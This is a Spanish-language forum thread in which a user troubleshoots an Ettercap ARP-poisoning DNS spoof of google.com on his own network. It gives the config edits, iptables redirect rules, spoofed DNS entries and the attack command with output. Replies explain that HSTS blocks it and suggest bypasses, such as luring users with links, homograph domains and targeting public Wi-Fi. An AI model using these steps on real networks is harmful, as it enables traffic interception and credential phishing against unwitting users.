[HELP] dns spoof by Ettercap

Iniciado por AnnonymuysByte, 24 Diciembre 2019, 14:30 PM

0 Miembros y 1 Visitante están viendo este tema.

AnnonymuysByte

Hola, estoy probando esto de dns spoof en Ettercap, vi varios tutoriales en youtube y hago lo siguiente..

Primero configuro el archivo /etc/ettercap/etter.conf

y coloco lo siguiente:

al principio de todo coloco esto:

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default


Despues en las lineas que estan comentadas abajo las descomento

Citar# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Aplico cambios y guardo.

despues voy al archivo /etc/ettercap/etter.dns

Alli coloco el DNS spoof basicamente de la siguiente manera

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#



google.com      A 192.168.1.138
*.google.com    A   192.168.1.138
www.google.com  PTR 192.168.1.138



Aplico cambios y guardo

Inicio mi servidor Apache en mi maquina Kali Linux y verifico que pueda ingresar desde mi pc fisica (windows) efectivamente puedo ingresar sin prolemas

Inicio despues Ettercap via linea de comandos con lo siguiente

Citarettercap -T -q -i eth0 -M arp:remote -P dns_spoof //192.168.1.1// //192.168.1.138//


192.168.1.1 es la puerta de enlace de mi router 192.168.1.138 mi maquina fisica..

Me arroja esta salida:

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.1 E4:18:6B:64:4B:8C

GROUP 2 : 192.168.1.138 02:94:A1:CB:43:8C
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...


despues voy a la maquina fisica y coloco un ping google.com en la consola

efectivamente el ping va dirijido a lo que seria la ip 192.168.1.138

En la consola de Ettercap me salta esto cuando intento abrir google.com en cualquier navegador.

dns_spoof: A [www.google.com] spoofed to [192.168.1.138]


En definitiva el Spoof esta funcionando correctamente

sin embargo cuando intento abrir el navegador y coloco google.com, no me carga, intente con internet explorer, google chrome y fiferox.

aveces me salta error de certificado y aveces queda cargando y me dice se ha restablecido la conexion

Cabe destacar que pruebo de nuevo ingresando la IP del apache al que es rederigido y el apache carga normalmente, es decir, esta funcionando.. en la consola salta como que el ping de google.com es esa ip del apache, pero en el navegador no carga, ningun navegador. no se cual es el prolema, si es un error de seguridad de los navegadores o si estoy haciendo algo mal.. gracias un saludo

engel lex

#1
Citarno se cual es el prolema, si es un error de seguridad de los navegadores o si estoy haciendo algo mal..

por eso es importante estudiar los temas antes que hacer pruebas locas y dar tumbos de ciegos...

en buenahora! te has topado con HSTS el sistema para evitar falsificado de paginas...

solo podras falsificar paginas que no tengan configurado su hsts o que el navegador no haya decidido recordar, o paginas que no tengan https... y no intentes degradar la conexión de https a http porque no funcionará
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

@XSStringManolo

Algunos sitios te saltas el HSTS añadiendo www. :xD

Puedes hacer un workaround y lurear al usuario con un link. En este post lo tienes en detalle:
https://foro.elhacker.net/post.html;quote=2212185;topic=502139.0;num_replies=1


Este fallo lo había en telegram hasta no hace mucho.
CitarTelegram CVE-2019-10044 Homograph Domain Spoofing Vulnerability Release Date:2019-03-25


Para saltarte el HSTS necesitas un server ssl con certificado del sitio al que haces spoof.
Es un ataque muy tocho para redes wi-fi públicas. Siempre puedes optar por un proxy y editar las cabeceras y respuestas de los sitios y hacer cosas raras en sitios inseguros para modificar el behavior del cliente.

Aquí puedes buscar si los sitios hacen el handshake por http o si están en la lista y por tanto inician directamente sobre https
https://hstspreload.org/